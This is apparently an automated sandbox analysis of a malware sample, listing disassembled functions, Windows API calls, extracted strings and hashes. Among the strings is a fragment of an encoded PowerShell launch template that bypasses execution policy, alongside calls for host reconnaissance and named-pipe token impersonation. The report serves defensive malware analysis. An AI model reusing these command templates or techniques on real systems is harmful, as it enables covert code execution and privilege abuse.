                  • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
                  • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708
                • malloc.LIBCMT ref: 001A3AB3
                  • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE718
                  • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE71D
                • malloc.LIBCMT ref: 001A3ABE
                • free.LIBCMT ref: 001A3C7E
                • free.LIBCMT ref: 001A3C86
                • free.LIBCMT ref: 001A3C8E
                  • Part of subcall function 001A48F0: malloc.LIBCMT ref: 001A493A
                  • Part of subcall function 001A48F0: malloc.LIBCMT ref: 001A4945
                  • Part of subcall function 001A48F0: free.LIBCMT ref: 001A4A2C
                  • Part of subcall function 001A48F0: free.LIBCMT ref: 001A4A34
                • free.LIBCMT ref: 001A3C9A
                • free.LIBCMT ref: 001A3CA7
                • free.LIBCMT ref: 001A3CB4
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: free$malloc$_errno$_callnewh
                • String ID:
                • API String ID: 4160633307-0
                • Opcode ID: 930309f8498ff7a349f5473874db00cb4ae22164d30aab4612de4250541046de
                • Instruction ID: 209368a58deb9e4cad09f9a49730c8180387322b07902ac6a1c357e03485ee58
                • Opcode Fuzzy Hash: 930309f8498ff7a349f5473874db00cb4ae22164d30aab4612de4250541046de
                • Instruction Fuzzy Hash: 4D61056630478446DF25EF2698507AFBB91F7A6FD8F044126EE4A57B09DF38C606CB00
                APIs
                • malloc.LIBCMT ref: 006646A9
                  • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                  • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                  • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                  • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                  • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                  • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                • malloc.LIBCMT ref: 006646B3
                  • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F318
                  • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F31D
                • malloc.LIBCMT ref: 006646BE
                • free.LIBCMT ref: 0066487E
                • free.LIBCMT ref: 00664886
                • free.LIBCMT ref: 0066488E
                  • Part of subcall function 006654F0: malloc.LIBCMT ref: 0066553A
                  • Part of subcall function 006654F0: malloc.LIBCMT ref: 00665545
                  • Part of subcall function 006654F0: free.LIBCMT ref: 0066562C
                  • Part of subcall function 006654F0: free.LIBCMT ref: 00665634
                • free.LIBCMT ref: 0066489A
                • free.LIBCMT ref: 006648A7
                • free.LIBCMT ref: 006648B4
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: free$malloc$_errno$_callnewh$AllocHeap
                • String ID:
                • API String ID: 3534990644-0
                • Opcode ID: cc81e054d2004eb51c8bee4b84b58d4814fb308bd44c01250cbaa5dfc0e514d5
                • Instruction ID: 34910b46c727ce7705f8db602624640e91d5cf5abd5de39ae3148aadea8298a6
                • Opcode Fuzzy Hash: cc81e054d2004eb51c8bee4b84b58d4814fb308bd44c01250cbaa5dfc0e514d5
                • Instruction Fuzzy Hash: 0A61D0227087C586DB65AF669450BAA7B93FB85BC8F448129DE4A47B06DF38C906CB04
                APIs
                  • Part of subcall function 001B53EC: malloc.LIBCMT ref: 001B5408
                • malloc.LIBCMT ref: 001ABF3B
                  • Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
                  • Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
                  • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
                  • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
                  • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708
                  • Part of subcall function 001BB630: _time64.LIBCMT ref: 001BB654
                  • Part of subcall function 001BB630: malloc.LIBCMT ref: 001BB69C
                  • Part of subcall function 001BB630: strtok.LIBCMT ref: 001BB700
                  • Part of subcall function 001BB630: strtok.LIBCMT ref: 001BB711
                  • Part of subcall function 001B28A0: _time64.LIBCMT ref: 001B28AE
                  • Part of subcall function 001BDEA8: malloc.LIBCMT ref: 001BDEF8
                  • Part of subcall function 001BDEA8: realloc.LIBCMT ref: 001BDF07
                • malloc.LIBCMT ref: 001AC04A
                • _snprintf.LIBCMT ref: 001AC0C1
                • _snprintf.LIBCMT ref: 001AC0E7
                • _snprintf.LIBCMT ref: 001AC10E
                • free.LIBCMT ref: 001AC2C6
                  • Part of subcall function 001BA144: malloc.LIBCMT ref: 001BA178
                  • Part of subcall function 001BA144: free.LIBCMT ref: 001BA32F
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: malloc$_snprintf$_errno_time64freestrtok$_callnewhrealloc
                • String ID: /'); %s
                • API String ID: 1314452303-1283008465
                • Opcode ID: a14b20026d747f2b5753e6fc705179295a1c2f23b63bad27e5059ac536f54d83
                • Instruction ID: 2e1e53b0162e0ebcb552ed176464fe12739a6b053966d81585ff3166033a2d9c
                • Opcode Fuzzy Hash: a14b20026d747f2b5753e6fc705179295a1c2f23b63bad27e5059ac536f54d83
                • Instruction Fuzzy Hash: 0DA1D13530068186DB18FBB2E8917EE7392ABA67C1F804125FE5A47796DF3CC806C741
                APIs
                  • Part of subcall function 00675FEC: malloc.LIBCMT ref: 00676008
                • malloc.LIBCMT ref: 0067B528
                  • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                  • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                  • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                  • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                  • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                  • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                  • Part of subcall function 0067EAA8: malloc.LIBCMT ref: 0067EAF8
                • GetComputerNameExA.KERNEL32 ref: 0067B5EA
                • GetComputerNameA.KERNEL32 ref: 0067B61F
                • GetUserNameA.ADVAPI32 ref: 0067B654
                  • Part of subcall function 0066F014: WSASocketA.WS2_32 ref: 0066F042
                • malloc.LIBCMT ref: 0067B76D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: malloc$Name$Computer_errno$AllocHeapSocketUser_callnewh
                • String ID: VUUU
                • API String ID: 632458648-2040033107
                • Opcode ID: 05713f2820868472ca49688c2b85268c5ac8a6a8808567d94079f7d4b5d3be16
                • Instruction ID: d29d9931251baad784a1826376812f60e93414938d2a0f9df4c39f6f065345ae
                • Opcode Fuzzy Hash: 05713f2820868472ca49688c2b85268c5ac8a6a8808567d94079f7d4b5d3be16
                • Instruction Fuzzy Hash: 69913636700A9086EB44EF6AD8653AD2353BB89BC4FC0D029EE0D5BB56DF39C945C704
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _snprintf
                • String ID: /'); %s$rshell -nop -exec bypass -EncodedCommand "%s"
                • API String ID: 3512837008-1250630670
                • Opcode ID: 72e4e973a1d0442b98f7febb78707b45b3081222fbe35b5ecbc6412512dc3076
                • Instruction ID: 6a465962cabf8489c5691470ad028bed19716a351b7ab40bfcc4a69e4c0c2c17
                • Opcode Fuzzy Hash: 72e4e973a1d0442b98f7febb78707b45b3081222fbe35b5ecbc6412512dc3076
                • Instruction Fuzzy Hash: 7A719976300B85A6EB10DF61E8807ED77A1F799788F840526EE4E13BA8DF78C509C700
                APIs
                  • Part of subcall function 00675FEC: malloc.LIBCMT ref: 00676008
                • GetStartupInfoA.KERNEL32 ref: 00671540
                  • Part of subcall function 0066FE54: MultiByteToWideChar.KERNEL32 ref: 0066FE81
                  • Part of subcall function 0066FE54: MultiByteToWideChar.KERNEL32 ref: 0066FEA9
                • GetCurrentDirectoryW.KERNEL32 ref: 006715CD
                • GetCurrentDirectoryW.KERNEL32 ref: 006715DC
                • CreateProcessWithLogonW.ADVAPI32 ref: 00671637
                • GetLastError.KERNEL32 ref: 00671641
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: ByteCharCurrentDirectoryMultiWide$CreateErrorInfoLastLogonProcessStartupWithmalloc
                • String ID: %s as %s\%s: %d
                • API String ID: 3435635427-816037529
                • Opcode ID: bd007c1fecfa8e9c64263907c3ef2a9985436de431c3054d3c53bc822cf7e9f1
                • Instruction ID: 80a158382953b88b06e520f675666d0f8cd5c6e7d3343fb356ae6e5c51471de1
                • Opcode Fuzzy Hash: bd007c1fecfa8e9c64263907c3ef2a9985436de431c3054d3c53bc822cf7e9f1
                • Instruction Fuzzy Hash: 35515A32204B8186DB60DF16F85475AB7AAF789B80F54802AEF8D97F29DF39C055CB44
                APIs
                  • Part of subcall function 001B53EC: malloc.LIBCMT ref: 001B5408
                  • Part of subcall function 001BFA20: _errno.LIBCMT ref: 001BF977
                  • Part of subcall function 001BFA20: _invalid_parameter_noinfo.LIBCMT ref: 001BF982
                • fseek.LIBCMT ref: 001B0B30
                  • Part of subcall function 001C02A4: _errno.LIBCMT ref: 001C02CC
                  • Part of subcall function 001C02A4: _invalid_parameter_noinfo.LIBCMT ref: 001C02D7
                • _ftelli64.LIBCMT ref: 001B0B38
                  • Part of subcall function 001C0318: _errno.LIBCMT ref: 001C0336
                  • Part of subcall function 001C0318: _invalid_parameter_noinfo.LIBCMT ref: 001C0341
                • fseek.LIBCMT ref: 001B0B48
                  • Part of subcall function 001C02A4: _fseek_nolock.LIBCMT ref: 001C02F5
                • malloc.LIBCMT ref: 001B0B88
                  • Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
                  • Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
                  • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
                  • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
                  • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708
                  • Part of subcall function 001AC444: malloc.LIBCMT ref: 001AC457
                • fclose.LIBCMT ref: 001B0C45
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _errno$_invalid_parameter_noinfomalloc$fseek$_callnewh_fseek_nolock_ftelli64fclose
                • String ID: mode
                • API String ID: 1756087678-2976727214
                • Opcode ID: f827565397daa4a866320a6784096609c7711a7c42725b9a2a2b01c24697e092
                • Instruction ID: 90d0e5ddde56df2123dc45e1f2ef815405a37f99bc65f5c34af3800dbad401eb
                • Opcode Fuzzy Hash: f827565397daa4a866320a6784096609c7711a7c42725b9a2a2b01c24697e092
                • Instruction Fuzzy Hash: B541D82631468082DB14EB12E8557AE7752F7EDBD0F808226EE5E47B96DF3CC506CB40
                APIs
                • malloc.LIBCMT ref: 001B864F
                  • Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
                  • Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
                  • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
                  • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
                  • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708
                • _snprintf.LIBCMT ref: 001B8667
                  • Part of subcall function 001BEA3C: _errno.LIBCMT ref: 001BEA73
                  • Part of subcall function 001BEA3C: _invalid_parameter_noinfo.LIBCMT ref: 001BEA7E
                • free.LIBCMT ref: 001B867E
                  • Part of subcall function 001BE644: _errno.LIBCMT ref: 001BE664
                • malloc.LIBCMT ref: 001B86CE
                • _snprintf.LIBCMT ref: 001B86E6
                • free.LIBCMT ref: 001B870E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _errno$_snprintffreemalloc$_callnewh_invalid_parameter_noinfo
                • String ID: /'); %s
                • API String ID: 761449704-1283008465
                • Opcode ID: 6cfeb8f42d39390d21f7f655b5309285a784ce0f998201f3a4c834a9ff33a05d
                • Instruction ID: 53664babb93e745c368a5b9844ddd80b759a732194ffa29d953fd55d02d63f9f
                • Opcode Fuzzy Hash: 6cfeb8f42d39390d21f7f655b5309285a784ce0f998201f3a4c834a9ff33a05d
                • Instruction Fuzzy Hash: 193135213006C125DA199FA36C143E9BB66B79AFE4F984112DEE507BA6CF3CC443C300
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLast$OpenProcessToken
                • String ID:
                • API String ID: 2009710997-0
                • Opcode ID: 12a3f9e128b967964898bf965f43ef985f021f837df021f2e119c6413e458a11
                • Instruction ID: be70d9a1b9824e6d91bdd001a0645cfd12320119953c9e94c73a6e9c154cd505
                • Opcode Fuzzy Hash: 12a3f9e128b967964898bf965f43ef985f021f837df021f2e119c6413e458a11
                • Instruction Fuzzy Hash: 0C21C425304B0186EB54AF62E46475A67A3FBC8BA4F14803CAE4E43B15DF3EC44ACB84
                APIs
                • _errno.LIBCMT ref: 001BF236
                  • Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C
                • _invalid_parameter_noinfo.LIBCMT ref: 001BF242
                • __crtIsPackagedApp.LIBCMT ref: 001BF253
                • _dosmaperr.LIBCMT ref: 001BF29D
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: Packaged__crt_dosmaperr_errno_getptd_noexit_invalid_parameter_noinfo
                • String ID:
                • API String ID: 2917016420-0
                • Opcode ID: 6bd0c9401fb351ee2ef62b7ec5c1d05d22ccd8d85f9d07845cb75c559d0d09e7
                • Instruction ID: 3ed8b6cf709debf8d3d5eb5d30d3862baa036c4a4594f282fce4260f8f547789
                • Opcode Fuzzy Hash: 6bd0c9401fb351ee2ef62b7ec5c1d05d22ccd8d85f9d07845cb75c559d0d09e7
                • Instruction Fuzzy Hash: 0821CF36300B4096EB14AF76AC153ADB7E1FBA9BA4F184639EE49437A5DF3CC4428700
                APIs
                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 001CF004
                  • Part of subcall function 001C0A00: _getptd.LIBCMT ref: 001C0A16
                  • Part of subcall function 001C0A00: __updatetlocinfo.LIBCMT ref: 001C0A4B
                  • Part of subcall function 001C0A00: __updatetmbcinfo.LIBCMT ref: 001C0A72
                • _errno.LIBCMT ref: 001CF01F
                • _invalid_parameter_noinfo.LIBCMT ref: 001CF02A
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_invalid_parameter_noinfo
                • String ID:
                • API String ID: 3191669884-0
                • Opcode ID: 17da934d4d304edacbb08e48815c32878d4d79cd43a7a40298e59a88dbb9cc3b
                • Instruction ID: 0ce4bd91c6ac52b6e23cc360a9f001d43c82dac6a01da28f891c7d467d7c2d83
                • Opcode Fuzzy Hash: 17da934d4d304edacbb08e48815c32878d4d79cd43a7a40298e59a88dbb9cc3b
                • Instruction Fuzzy Hash: 45218B722047848AD7109F52D485F69B7A6F7A9FE0F69823DEF5807B46CB34C856CB00
                APIs
                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0068FC04
                  • Part of subcall function 00681600: _getptd.LIBCMT ref: 00681616
                  • Part of subcall function 00681600: __updatetlocinfo.LIBCMT ref: 0068164B
                  • Part of subcall function 00681600: __updatetmbcinfo.LIBCMT ref: 00681672
                • _errno.LIBCMT ref: 0068FC1F
                • _invalid_parameter_noinfo.LIBCMT ref: 0068FC2A
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_invalid_parameter_noinfo
                • String ID:
                • API String ID: 3191669884-0
                • Opcode ID: 04a51c6534ba67d8c2ce71a0e6c0b8946822a3beaaa0ad6abf8e1e016199c0f5
                • Instruction ID: d3b0a8c39b02e232e219af6ac56bdc75e73b4ff08cdd2bd878a79b47920382d2
                • Opcode Fuzzy Hash: 04a51c6534ba67d8c2ce71a0e6c0b8946822a3beaaa0ad6abf8e1e016199c0f5
                • Instruction Fuzzy Hash: 482183723047888AD761AF11D48469EB7A6FB95BE0F684335EF5817B55CB34CA82C700
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: CountTickioctlsocket
                • String ID:
                • API String ID: 3686034022-0
                • Opcode ID: 178b23397deac81d3d51abbf71857af196517098d1f0b7b181b2ee049de2b99e
                • Instruction ID: bbe50e0202cb6f6ad8ee280aec3c1a58fbc916d8ae08fde82de85a24ae74b9b2
                • Opcode Fuzzy Hash: 178b23397deac81d3d51abbf71857af196517098d1f0b7b181b2ee049de2b99e
                • Instruction Fuzzy Hash: 94112932704EC197E7108B69E8543597322E784BB4F504220DB4E86EA0DFBDCC99CB50
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: NamedPipe$Thread$ClientConnectCurrentDisconnectErrorFileImpersonateLastOpenReadToken
                • String ID:
                • API String ID: 4232080776-0
                • Opcode ID: ef7db9755eefa0db9f7ee1ec6e209610e40617530726d74f2edde71b678aab6d
                • Instruction ID: b18c62b105e39fa9bd382888b4b7a9ba732a94301dd04494ffbb538dad6fbaa7
                • Opcode Fuzzy Hash: ef7db9755eefa0db9f7ee1ec6e209610e40617530726d74f2edde71b678aab6d
                • Instruction Fuzzy Hash: 7311E331710642C6F750AB25EC647AA3327FBC4B44F848116890E82E60DF3EC568CB62
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _errno$_filbuf_fileno_getptd_noexit_invalid_parameter_noinfomemcpy_s
                • String ID:
                • API String ID: 2328795619-0
                • Opcode ID: a6b8c894bc097219f3410178b0f3ee4aa495d15850340b6c84f373b071b042dd
                • Instruction ID: c862a0ed6b8f5ce2fa69b836523f6c9ead2efe547d3ca5b4723f08b5149bf0ef
                • Opcode Fuzzy Hash: a6b8c894bc097219f3410178b0f3ee4aa495d15850340b6c84f373b071b042dd
                • Instruction Fuzzy Hash: 07512C32704350C69B198A665900BBAB691B769BF4F19872DFF7943FD5CB38C4A28740
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _errno$_filbuf_fileno_getptd_noexit_invalid_parameter_noinfomemcpy_s
                • String ID:
                • API String ID: 2328795619-0
                • Opcode ID: 4bbdce99b29ecd3e24264ac9f3b66a56e11342a03ebc5466d7d382185dba5216
                • Instruction ID: 482e37c5ac51eca48aac66d78720c05e2b5d2f6479f3cc17f4d53c8a761545bf
                • Opcode Fuzzy Hash: 4bbdce99b29ecd3e24264ac9f3b66a56e11342a03ebc5466d7d382185dba5216
                • Instruction Fuzzy Hash: AF51603170475086FB98BE6695005AAB693F755FF8F148F24AE3947FD4CB38D49A8340
                APIs
                • malloc.LIBCMT ref: 001B1063
                  • Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
                  • Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
                  • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
                  • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
                  • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708
                  • Part of subcall function 001AC444: malloc.LIBCMT ref: 001AC457
                • free.LIBCMT ref: 001B115E
                • free.LIBCMT ref: 001B116B
                  • Part of subcall function 001BE644: _errno.LIBCMT ref: 001BE664
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _errno$freemalloc$_callnewh
                • String ID: 1:%u/'); %s$n from %d (%u)$open process: %d (%u)
                • API String ID: 2029259483-317027030
                • Opcode ID: dc04f393f0e4fed79304e7eb9afd54a7656e6f03fcd842c9ac36e4d1f5269005
                • Instruction ID: c88a008fba11b0880876a59c021beeebc6c3bd86dbfa66db4d61d791c2e2c4ff
                • Opcode Fuzzy Hash: dc04f393f0e4fed79304e7eb9afd54a7656e6f03fcd842c9ac36e4d1f5269005
                • Instruction Fuzzy Hash: 4651C072708790A6DB10DF66E4503EEB7A2F399B94F404016EE8A47B58EF7CC609CB40
                APIs
                • _mtinitlocknum.LIBCMT ref: 0068A375
                  • Part of subcall function 00683E58: _FF_MSGBANNER.LIBCMT ref: 00683E75
                  • Part of subcall function 00683E58: _NMSG_WRITE.LIBCMT ref: 00683E7F
                • InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 0068A3F8
                • EnterCriticalSection.KERNEL32 ref: 0068A414
                • LeaveCriticalSection.KERNEL32 ref: 0068A424
                • _calloc_crt.LIBCMT ref: 0068A49A
                • __lock_fhandle.LIBCMT ref: 0068A502
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: CriticalSection$CountEnterInitializeLeaveSpin__lock_fhandle_calloc_crt_mtinitlocknum
                • String ID:
                • API String ID: 445582508-0
                • Opcode ID: 37ad4fda8a075f5cd4d07cec490ae037cae96ac67048c51c0eece2b82dd4d161
                • Instruction ID: 4914a5b9f05a24cbee6919df2c3318ca5fba6cc4527ed45511ea0f3f6cba0893
                • Opcode Fuzzy Hash: 37ad4fda8a075f5cd4d07cec490ae037cae96ac67048c51c0eece2b82dd4d161
                • Instruction Fuzzy Hash: 0E51F33260078082EF20EF54D45436DB7ABFB94B58F19471ADE4E477A0DBB8C956C702
                APIs
                  • Part of subcall function 00675FEC: malloc.LIBCMT ref: 00676008
                  • Part of subcall function 00680620: _errno.LIBCMT ref: 00680577
                  • Part of subcall function 00680620: _invalid_parameter_noinfo.LIBCMT ref: 00680582
                • fseek.LIBCMT ref: 00671730
                  • Part of subcall function 00680EA4: _errno.LIBCMT ref: 00680ECC
                  • Part of subcall function 00680EA4: _invalid_parameter_noinfo.LIBCMT ref: 00680ED7
                • _ftelli64.LIBCMT ref: 00671738
                  • Part of subcall function 00680F18: _errno.LIBCMT ref: 00680F36
                  • Part of subcall function 00680F18: _invalid_parameter_noinfo.LIBCMT ref: 00680F41
                • fseek.LIBCMT ref: 00671748
                  • Part of subcall function 00680EA4: _fseek_nolock.LIBCMT ref: 00680EF5
                • GetFullPathNameA.KERNEL32 ref: 0067176B
                • malloc.LIBCMT ref: 00671788
                  • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                  • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                  • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                  • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                  • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                  • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                  • Part of subcall function 0066D044: malloc.LIBCMT ref: 0066D057
                  • Part of subcall function 0066D074: htonl.WS2_32 ref: 0066D07F
                • fclose.LIBCMT ref: 00671845
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _errno$_invalid_parameter_noinfomalloc$fseek$AllocFullHeapNamePath_callnewh_fseek_nolock_ftelli64fclosehtonl
                • String ID:
                • API String ID: 3587854850-0
                • Opcode ID: f2abbbf20f3530519e2fbcb7cf3f65dd4e7c47c251f31922550871d18ad798e2
                • Instruction ID: 7ab80978dd0f55085e882ccbcc8fdfab77c345480eb8815360099638d3a819f6
                • Opcode Fuzzy Hash: f2abbbf20f3530519e2fbcb7cf3f65dd4e7c47c251f31922550871d18ad798e2
                • Instruction Fuzzy Hash: CB41F52271468082DB84EB26E41576E6353F7C9BD0F90C22AEE5E4BB96DF3DC506CB05
                APIs
                • GetACP.KERNEL32 ref: 00675C78
                • GetOEMCP.KERNEL32 ref: 00675C82
                • GetCurrentProcessId.KERNEL32 ref: 00675CA8
                • GetTickCount.KERNEL32 ref: 00675CB0
                  • Part of subcall function 0068044C: _getptd.LIBCMT ref: 00680454
                • GetCurrentProcess.KERNEL32 ref: 00675CEC
                  • Part of subcall function 00670C64: GetModuleHandleA.KERNEL32 ref: 00670C79
                  • Part of subcall function 00670C64: GetProcAddress.KERNEL32 ref: 00670C89
                • GetCurrentProcessId.KERNEL32 ref: 00675D5E
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: CurrentProcess$AddressCountHandleModuleProcTick_getptd
                • String ID:
                • API String ID: 3426420785-0
                • Opcode ID: cace55278df1f4be28c563725835e26b24be87b65be8dda4f354c1bcfac1d593
                • Instruction ID: a31f047bb2689254cef874948690ad23f5f662dbf2868a21ec4335529d286551
                • Opcode Fuzzy Hash: cace55278df1f4be28c563725835e26b24be87b65be8dda4f354c1bcfac1d593
                • Instruction Fuzzy Hash: EB410662710611A5FF40EBB1DC6579D33ABBF89784F40441AEE0D87A69EF3AC10AC758
                APIs
                • malloc.LIBCMT ref: 00676F5E
                  • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                  • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                  • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                  • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                  • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
